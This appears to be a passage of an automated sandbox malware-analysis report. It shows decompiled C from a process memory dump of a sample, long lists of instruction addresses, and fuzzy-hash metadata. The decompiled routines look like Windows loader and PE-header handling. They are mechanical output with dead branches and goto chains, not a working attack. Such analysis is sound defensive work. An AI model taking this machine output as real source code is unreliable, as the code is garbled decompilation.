															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0177FFB0(_t293, _t353, 0x18584d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E017A37F5(_t353, 0);
																}
																E017A0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01799B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E017902D6(_t174);
																}
																L017877F0( *0x1857b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0179C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0177EC7F(_t353);
										L017919B8(_t287, 0, _t353, 0);
										_t200 = E0176F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x185b2f8 |  *0x185b2fc) == 0 || ( *0x185b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E017AB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x185b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01816B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01816AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E0177E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L0177EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E017A9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E0177E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L01778F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E017A3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                                              0x0177d5f2
                                                                              0x0177d5f5
                                                                              0x0177d5f5
                                                                              0x0177d5fd
                                                                              0x0177d600
                                                                              0x0177d60a
                                                                              0x0177d60d
                                                                              0x0177d617
                                                                              0x0177d61d
                                                                              0x0177d627
                                                                              0x0177d62e
                                                                              0x0177d911
                                                                              0x0177d913
                                                                              0x00000000
                                                                              0x0177d919
                                                                              0x0177d919
                                                                              0x0177d919
                                                                              0x0177d634
                                                                              0x0177d634
                                                                              0x0177d634
                                                                              0x0177d634
                                                                              0x0177d640
                                                                              0x0177d8bf
                                                                              0x00000000
                                                                              0x0177d646
                                                                              0x0177d646
                                                                              0x0177d64d
                                                                              0x0177d652
                                                                              0x017cb2fc
                                                                              0x017cb2fc
                                                                              0x017cb302
                                                                              0x017cb33b
                                                                              0x017cb341
                                                                              0x00000000
                                                                              0x017cb304
                                                                              0x017cb304
                                                                              0x017cb319
                                                                              0x017cb31e
                                                                              0x017cb324
                                                                              0x017cb326
                                                                              0x017cb332
                                                                              0x017cb347
                                                                              0x017cb34c
                                                                              0x017cb351
                                                                              0x017cb35a
                                                                              0x00000000
                                                                              0x017cb328
                                                                              0x017cb328
                                                                              0x00000000
                                                                              0x017cb328
                                                                              0x017cb326
                                                                              0x0177d658
                                                                              0x0177d658
                                                                              0x0177d65b
                                                                              0x0177d665
                                                                              0x00000000
                                                                              0x0177d66b
                                                                              0x0177d66b
                                                                              0x0177d66b
                                                                              0x0177d66b
                                                                              0x0177d66d
                                                                              0x0177d672
                                                                              0x0177d67a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0177d680
                                                                              0x0177d686
                                                                              0x0177d8ce
                                                                              0x0177d8d4
                                                                              0x0177d8dd
                                                                              0x0177d8e0
                                                                              0x0177d68c
                                                                              0x0177d691
                                                                              0x0177d69d
                                                                              0x0177d6a2
                                                                              0x0177d6a7
                                                                              0x0177d6b0
                                                                              0x0177d6b5
                                                                              0x0177d6e0
                                                                              0x0177d6b7
                                                                              0x0177d6b7
                                                                              0x0177d6b9
                                                                              0x0177d6b9
                                                                              0x0177d6bb
                                                                              0x0177d6bd
                                                                              0x0177d6ce
                                                                              0x0177d6d0
                                                                              0x0177d6d2
                                                                              0x017cb363
                                                                              0x017cb365
                                                                              0x00000000
                                                                              0x017cb36b
                                                                              0x00000000
                                                                              0x017cb36b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0177d6bf
                                                                              0x0177d6bf
                                                                              0x0177d6e5
                                                                              0x0177d6e7
                                                                              0x0177d6e9
                                                                              0x0177d6ec
                                                                              0x0177d6ec
                                                                              0x0177d6ef
                                                                              0x0177d6f5
                                                                              0x0177d6f9
                                                                              0x0177d6fb
                                                                              0x0177d6fd
                                                                              0x0177d701
                                                                              0x0177d703
                                                                              0x0177d70a
                                                                              0x0177d70a
                                                                              0x0177d701
                                                                              0x0177d710
                                                                              0x0177d710
                                                                              0x0177d6c1
                                                                              0x0177d6c1
                                                                              0x0177d6c6
                                                                              0x017cb36d
                                                                              0x017cb36f
                                                                              0x00000000
                                                                              0x017cb375
                                                                              0x017cb375
                                                                              0x017cb375
                                                                              0x00000000
                                                                              0x017cb375
                                                                              0x00000000
                                                                              0x0177d6cc
                                                                              0x0177d6d8
                                                                              0x0177d6d8
                                                                              0x0177d6d8
                                                                              0x00000000
                                                                              0x0177d6c6
                                                                              0x0177d6bf
                                                                              0x00000000
                                                                              0x0177d6da
                                                                              0x0177d6da
                                                                              0x0177d716
                                                                              0x0177d71b
                                                                              0x0177d720
                                                                              0x0177d726
                                                                              0x0177d726
                                                                              0x0177d72d
                                                                              0x00000000
                                                                              0x0177d733
                                                                              0x0177d739
                                                                              0x0177d742
                                                                              0x0177d750
                                                                              0x0177d758
                                                                              0x0177d764
                                                                              0x0177d776
                                                                              0x0177d77a
                                                                              0x0177d783
                                                                              0x0177d928
                                                                              0x0177d92c
                                                                              0x0177d93d
                                                                              0x0177d944
                                                                              0x0177d94f
                                                                              0x0177d954
                                                                              0x0177d956
                                                                              0x0177d95f
                                                                              0x0177d961
                                                                              0x0177d973
                                                                              0x0177d973
                                                                              0x0177d956
                                                                              0x0177d944
                                                                              0x0177d92c
                                                                              0x0177d78b
                                                                              0x017cb394
                                                                              0x0177d791
                                                                              0x0177d798
                                                                              0x017cb3a3
                                                                              0x017cb3bb
                                                                              0x017cb3bb
                                                                              0x0177d7a5
                                                                              0x0177d866
                                                                              0x0177d870
                                                                              0x0177d892
                                                                              0x0177d898
                                                                              0x0177d89e
                                                                              0x0177d8a0
                                                                              0x0177d8a6
                                                                              0x0177d8ac
                                                                              0x0177d8ae
                                                                              0x0177d8b4
                                                                              0x0177d8b4
                                                                              0x0177d8ae
                                                                              0x0177d7a5
                                                                              0x0177d78b
                                                                              0x0177d7b1
                                                                              0x017cb3c5
                                                                              0x017cb3c5
                                                                              0x0177d7c3
                                                                              0x0177d7ca
                                                                              0x0177d7e5
                                                                              0x0177d7eb
                                                                              0x0177d8eb
                                                                              0x0177d8ed
                                                                              0x00000000
                                                                              0x0177d8f3
                                                                              0x0177d8f3
                                                                              0x0177d8f3
                                                                              0x00000000
                                                                              0x0177d8ed
                                                                              0x0177d7cc
                                                                              0x0177d7cc
                                                                              0x0177d7d2
                                                                              0x00000000
                                                                              0x0177d7d4
                                                                              0x0177d7d4
                                                                              0x0177d7d7
                                                                              0x0177d7df
                                                                              0x017cb3d4
                                                                              0x017cb3d9
                                                                              0x017cb3dc
                                                                              0x017cb3dc
                                                                              0x017cb3df
                                                                              0x017cb3e2
                                                                              0x017cb468
                                                                              0x017cb46d
                                                                              0x017cb46f
                                                                              0x017cb46f
                                                                              0x017cb475
                                                                              0x0177d8f8
                                                                              0x0177d8f9
                                                                              0x0177d8fd
                                                                              0x017cb3e8
                                                                              0x017cb3e8
                                                                              0x017cb3eb
                                                                              0x017cb3ed
                                                                              0x00000000
                                                                              0x017cb3ef
                                                                              0x017cb3ef
                                                                              0x017cb3f1
                                                                              0x017cb3f4
                                                                              0x017cb3fe
                                                                              0x017cb404
                                                                              0x017cb409
                                                                              0x017cb40e
                                                                              0x017cb410
                                                                              0x017cb410
                                                                              0x017cb414
                                                                              0x017cb414
                                                                              0x017cb41b
                                                                              0x017cb420
                                                                              0x017cb423
                                                                              0x017cb425
                                                                              0x017cb427
                                                                              0x017cb42a
                                                                              0x017cb42d
                                                                              0x017cb42d
                                                                              0x017cb42a
                                                                              0x017cb432
                                                                              0x017cb436
                                                                              0x017cb438
                                                                              0x017cb43b
                                                                              0x017cb43b
                                                                              0x017cb449
                                                                              0x017cb44e
                                                                              0x017cb454
                                                                              0x017cb458
                                                                              0x017cb458
                                                                              0x017cb45d
                                                                              0x00000000
                                                                              0x017cb45d
                                                                              0x017cb3ed
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0177d7df
                                                                              0x0177d7d2
                                                                              0x0177d7ca
                                                                              0x017cb37c
                                                                              0x017cb37e
                                                                              0x017cb385
                                                                              0x017cb38a
                                                                              0x00000000
                                                                              0x017cb38a
                                                                              0x0177d742
                                                                              0x0177d7f1
                                                                              0x0177d7f8
                                                                              0x017cb49b
                                                                              0x017cb49b
                                                                              0x0177d800
                                                                              0x0177d837
                                                                              0x0177d843
                                                                              0x0177d845
                                                                              0x0177d847
                                                                              0x0177d84a
                                                                              0x0177d84b
                                                                              0x0177d84e
                                                                              0x0177d857
                                                                              0x0177d818
                                                                              0x0177d824
                                                                              0x0177d831
                                                                              0x017cb4a5
                                                                              0x017cb4ab
                                                                              0x017cb4b3
                                                                              0x017cb4b8
                                                                              0x017cb4bb
                                                                              0x00000000
                                                                              0x017cb4c1
                                                                              0x017cb4c1
                                                                              0x017cb4c8
                                                                              0x00000000
                                                                              0x017cb4ce
                                                                              0x017cb4d4
                                                                              0x017cb4e1
                                                                              0x017cb4e3
                                                                              0x017cb4e5
                                                                              0x00000000
                                                                              0x017cb4eb
                                                                              0x017cb4f0
                                                                              0x017cb4f2
                                                                              0x0177dac9
                                                                              0x0177dacc
                                                                              0x0177dacf
                                                                              0x0177dad1
                                                                              0x0177dd78
                                                                              0x0177dd78
                                                                              0x0177dcf2
                                                                              0x00000000
                                                                              0x0177dad7
                                                                              0x0177dad9
                                                                              0x0177dadb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0177dae1
                                                                              0x0177dae1
                                                                              0x0177dae4
                                                                              0x0177dae6
                                                                              0x017cb4f9
                                                                              0x017cb4f9
                                                                              0x017cb500
                                                                              0x0177daec
                                                                              0x0177daec
                                                                              0x0177daf5
                                                                              0x0177daf8
                                                                              0x0177dafb
                                                                              0x0177db03
                                                                              0x0177db11
                                                                              0x0177db16
                                                                              0x0177db19
                                                                              0x0177db1b
                                                                              0x017cb52c
                                                                              0x017cb531
                                                                              0x017cb534
                                                                              0x0177db21
                                                                              0x0177db21
                                                                              0x0177db24
                                                                              0x0177dcd9
                                                                              0x0177dce2
                                                                              0x0177dce5
                                                                              0x0177dd6a
                                                                              0x0177dd6d
                                                                              0x00000000
                                                                              0x0177dd73
                                                                              0x017cb51a
                                                                              0x017cb51c
                                                                              0x017cb51f
                                                                              0x017cb524
                                                                              0x00000000
                                                                              0x017cb524
                                                                              0x0177dce7
                                                                              0x0177dce7
                                                                              0x0177dce7
                                                                              0x00000000
                                                                              0x0177dce7
                                                                              0x00000000
                                                                              0x0177db2a
                                                                              0x0177db2c
                                                                              0x0177db31
                                                                              0x0177db33
                                                                              0x0177db36
                                                                              0x0177db39
                                                                              0x0177db3b
                                                                              0x0177db66
                                                                              0x0177db66
                                                                              0x0177db3d
                                                                              0x0177db3d
                                                                              0x0177db3e
                                                                              0x0177db46
                                                                              0x0177db47
                                                                              0x0177db49
                                                                              0x0177db4c
                                                                              0x0177db53
                                                                              0x0177db55
                                                                              0x0177db58
                                                                              0x0177db5a
                                                                              0x017cb50a
                                                                              0x017cb50f
                                                                              0x017cb512
                                                                              0x0177db60
                                                                              0x0177db60
                                                                              0x0177db63
                                                                              0x0177db63
                                                                              0x00000000
                                                                              0x0177db63
                                                                              0x0177db5a
                                                                              0x0177db3b
                                                                              0x0177db24
                                                                              0x0177db69
                                                                              0x0177db69
                                                                              0x0177db6c
                                                                              0x0177db6f
                                                                              0x0177db74
                                                                              0x017cb557
                                                                              0x017cb557
                                                                              0x017cb55e
                                                                              0x0177db7a
                                                                              0x0177db7c
                                                                              0x0177db7f
                                                                              0x0177db82
                                                                              0x0177db85
                                                                              0x00000000
                                                                              0x0177db8b
                                                                              0x0177db8b
                                                                              0x0177db8d
                                                                              0x0177db9b
                                                                              0x0177db9b
                                                                              0x0177db9d
                                                                              0x0177dba0
                                                                              0x0177dba2
                                                                              0x0177dba4
                                                                              0x0177dba7
                                                                              0x0177dba9
                                                                              0x0177dbae
                                                                              0x0177dbae
                                                                              0x0177dbb1
                                                                              0x0177dbb4
                                                                              0x0177dbb4
                                                                              0x0177dbb7
                                                                              0x0177dbba
                                                                              0x0177dcd2
                                                                              0x0177dcd4
                                                                              0x00000000
                                                                              0x0177dbc0
                                                                              0x0177dbc0
                                                                              0x0177dbd2
                                                                              0x0177dbd7
                                                                              0x0177dbda
                                                                              0x0177dbdd
                                                                              0x0177dbdf
                                                                              0x00000000
                                                                              0x0177dbe5
                                                                              0x0177dbe5
                                                                              0x0177dbee
                                                                              0x0177dbf1
                                                                              0x017cb541
                                                                              0x017cb544
                                                                              0x00000000
                                                                              0x017cb546
                                                                              0x017cb546
                                                                              0x00000000
                                                                              0x017cb546
                                                                              0x0177dbf7
                                                                              0x0177dbf7
                                                                              0x0177dbfd
                                                                              0x0177dbfd
                                                                              0x0177dbff
                                                                              0x0177dc0b
                                                                              0x0177dc15
                                                                              0x0177dc1b
                                                                              0x0177dc1d
                                                                              0x0177dc21
                                                                              0x0177dc21
                                                                              0x0177dc23
                                                                              0x0177dc23
                                                                              0x0177dc26
                                                                              0x0177dc29
                                                                              0x0177dc2b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0177dc31
                                                                              0x0177dc34
                                                                              0x0177dc36
                                                                              0x0177dcbf
                                                                              0x0177dcbf
                                                                              0x0177dcc2
                                                                              0x00000000
                                                                              0x0177dc3c
                                                                              0x0177dc41
                                                                              0x0177dc43
                                                                              0x00000000
                                                                              0x0177dc45
                                                                              0x0177dc45
                                                                              0x0177dc47
                                                                              0x00000000
                                                                              0x0177dc4d
                                                                              0x0177dc4d
                                                                              0x0177dc50
                                                                              0x0177dc52
                                                                              0x0177dc55
                                                                              0x0177dcfa
                                                                              0x0177dcfe
                                                                              0x0177dd08
                                                                              0x0177dd0a
                                                                              0x0177dd0c
                                                                              0x00000000
                                                                              0x0177dd12
                                                                              0x0177dd15
                                                                              0x0177dd2d
                                                                              0x0177dd2f
                                                                              0x0177dd32
                                                                              0x0177dd35
                                                                              0x00000000
                                                                              0x0177dd35
                                                                              0x0177dc5b
                                                                              0x0177dc5b
                                                                              0x0177dc5e
                                                                              0x0177dc61
                                                                              0x0177dc64
                                                                              0x0177dc67
                                                                              0x0177dc67
                                                                              0x0177dc6a
                                                                              0x0177dc6c
                                                                              0x0177dc8e
                                                                              0x0177dc8e
                                                                              0x0177dc91
                                                                              0x0177dc93
                                                                              0x0177dcce
                                                                              0x0177dcce
                                                                              0x0177dc95
                                                                              0x0177dc9c
                                                                              0x0177dc6e
                                                                              0x0177dc72
                                                                              0x0177dc75
                                                                              0x0177dc77
                                                                              0x0177dc79
                                                                              0x017cb551
                                                                              0x017cb551
                                                                              0x00000000
                                                                              0x0177dc7f
                                                                              0x0177dc7f
                                                                              0x0177dc81
                                                                              0x00000000
                                                                              0x0177dc83
                                                                              0x0177dc86
                                                                              0x0177dc88
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0177dc88
                                                                              0x0177dc81
                                                                              0x0177dc79
                                                                              0x0177dc6c
                                                                              0x0177dc55
                                                                              0x0177dc47
                                                                              0x0177dc43
                                                                              0x00000000
                                                                              0x0177dc36
                                                                              0x0177dc23
                                                                              0x00000000
                                                                              0x0177dbff
                                                                              0x0177dbf1
                                                                              0x0177dbdf
                                                                              0x0177db8f
                                                                              0x0177db92
                                                                              0x0177db95
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0177db95
                                                                              0x0177db8d
                                                                              0x0177db85
                                                                              0x0177db74
                                                                              0x0177dc9f
                                                                              0x0177dca2
                                                                              0x0177dcb0
                                                                              0x0177dcb0
                                                                              0x0177dad1
                                                                              0x017cb4e5
                                                                              0x017cb4c8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0177d831
                                                                              0x00000000
                                                                              0x0177d800
                                                                              0x017cb47f
                                                                              0x017cb485
                                                                              0x00000000
                                                                              0x017cb485
                                                                              0x0177d665
                                                                              0x0177d652
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0945abf52bff4dcf188c9a377dd82aa91ab4930e0ad2eedee394e43b01c49a0b
                                                                              • Instruction ID: d935a5a7cd847376e4aae7233fc80c7dfe67dce18396d25ccc0aa0d56f9662c4
                                                                              • Opcode Fuzzy Hash: 0945abf52bff4dcf188c9a377dd82aa91ab4930e0ad2eedee394e43b01c49a0b
                                                                              • Instruction Fuzzy Hash: E0E1CF30A0035A8FEF359B68C884B69FBB2BF85744F0401EDE90997295D774AA81CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0177849B Relevance: .3, Instructions: 290COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 92%
                                                                              			E0177849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x183f9c0);
				E017BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1857b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0177CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01782280( *[fs:0x30], 0x1858550);
						_t139 =  *0x1857b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0179F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0177FFB0(_t193, _t235, 0x1858550);
								L5:
								return E017BD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E01761C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1857b9c; // 0x0
							_t235 = L01784620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1857b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0179A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0177FFB0(_t193, _t235, 0x1858550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L017877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L017877F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1857b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1857b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E017A37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1857b9c; // 0x0
									_t214 = L01784620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
